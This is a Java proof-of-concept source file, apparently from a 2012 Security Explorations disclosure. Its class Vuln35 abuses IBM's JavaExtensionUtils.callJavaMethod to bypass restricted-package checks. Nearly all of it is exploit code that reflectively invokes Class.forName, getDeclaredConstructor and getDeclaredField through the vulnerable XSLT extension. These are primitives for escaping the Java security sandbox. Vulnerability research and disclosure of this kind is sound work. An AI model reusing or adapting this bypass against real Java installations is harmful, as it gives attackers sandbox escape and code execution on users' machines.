/*## (c) SECURITY EXPLORATIONS    2012 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* com.ibm.xtq.xslt.runtime.extensions.JavaExtensionUtils                     */
/* restricted package bypass via arbitrary Method's invocation                */

/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.util.*;
import java.lang.reflect.*;
import com.ibm.xtq.xslt.runtime.extensions.*;

public class Vuln35 {

 static XSLTObject wrap(Object o) {
  return XSLTObject.createXSLTObject(null,o,o.getClass().getName());
 }

 static Object invoke(String cname,String mname,Object o,Object args[]) throws Throwable {
  HashMap map=new HashMap();
  map.put(cname,o);

  XSLTObject xargs[]=new XSLTObject[args.length];

  for(int i=0;i<args.length;i++) {
   xargs[i]=wrap(args[i]);
  }

  XSLTObject xres=JavaExtensionUtils.callJavaMethod(mname,cname,xargs,null,map);
 
  return xres.getValueObject(); 
 }

 public static Class load_class(String name) throws Throwable {
  Object args[]=new Object[1];
  args[0]=name;

  return (Class)invoke("java.lang.Class","forName",Thread.currentThread(),args);
 }

 public static Constructor get_constructor(Class c,Class cargs[]) throws Throwable {
  Object args[]=new Object[1];
  args[0]=cargs;

  return (Constructor)invoke("java.lang.Class","getDeclaredConstructor",c,args);
 }

 public static Field get_field(Class c,String name) throws Throwable {
  Object args[]=new Object[1];
  args[0]=name;

  return (Field)invoke("java.lang.Class","getDeclaredField",c,args);
 }

}
